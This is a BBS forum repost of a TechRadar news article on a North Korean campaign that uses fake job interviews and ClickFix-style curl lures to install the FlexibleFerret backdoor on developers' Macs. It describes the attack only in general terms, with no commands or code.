1. Forum
  2. tqwNet
  3. TQW GENTECH

  • New macOS malware chain could cause a major security headache - h

    From TechnologyDaily@1337:1/100 to All on Wednesday, November 26, 2025 18:45:10
    New macOS malware chain could cause a major security headache - here's what
    we know

    Date:
    Wed, 26 Nov 2025 18:33:00 +0000

    Description:
    North Korean hackers are targeting macOS devs now with fake jobs and a ClickFix approach.

    FULL STORY ======================================================================Jamf reports North Korean actors using fake job ads and ClickFix tactics to target macOS users Victims are tricked into running curl commands in Terminal, installing FlexibleFerret backdoor malware The campaign, dubbed Contagious Interview, enables credential theft, file exfiltration, and system compromise

    North Korean state-sponsored threat actors are targeting macOS users with new malware , utilizing a strategy that combines two popular approaches - fake
    job ads, and ClickFix, experts have warned.

    Security researchers Jamf confirmed they have spotted attacks in the wild using ClickFix, an attack method in which the victim is presented with a fake problem, and at the same time, presented with a fix. It is an evolution of
    the old You have a virus popup that dominated the internet in the early
    2000s.

    Jamf says DPRK-aligned operators from the FlexibleFerret malware family have been creating fake companies, fake LinkedIn profiles and, most importantly - fake job ads, as part of a wider campaign called Contagious Interview.

    Aura can protect your family with a plethora of features: Password Manager,
    ID theft protection, Antivirus, VPN, Parental Control and much more for just $20 per month! View Deal Curl commands and fake fixes

    Victims, mostly software developers, would either discover these websites and job ads by themselves, or would be invited for interviews via LinkedIn.

    After jumping through multiple loops, the victims would then be asked to record a video of themselves through the employers platform, but if they
    would try to do so, the platform would tell them that their camera isnt working properly.

    They would then be presented with a fix - a curl command to be entered into Terminal - which doesnt fix the problem but rather introduces malware to the system.

    This malware, essentially a backdoor, does a couple of things - generates a short machine identifier, checks for duplicates, and then pulls additional commands from a hard-coded command server.

    Those commands include collecting system information, uploading or
    downloading files, executing shell commands, pulling Chrome profile data, or triggering an automated credential theft.

    Organizations should treat unsolicited interview assessments and Terminal-based fix instructions as high-risk, and ensure users know to stop and report these prompts rather than follow them, the researchers concluded.

    Follow TechRadar on Google News and add us as a preferred source to get our expert news, reviews, and opinion in your feeds. Make sure to click the
    Follow button!

    And of course you can also follow TechRadar on TikTok for news, reviews, unboxings in video form, and get regular updates from us on WhatsApp too.



    ======================================================================
    Link to news story: https://www.techradar.com/pro/security/new-macos-malware-chain-could-cause-a-m ajor-security-headache-heres-what-we-know


    --- Mystic BBS v1.12 A49 (Linux/64)
    * Origin: tqwNet Technology News (1337:1/100)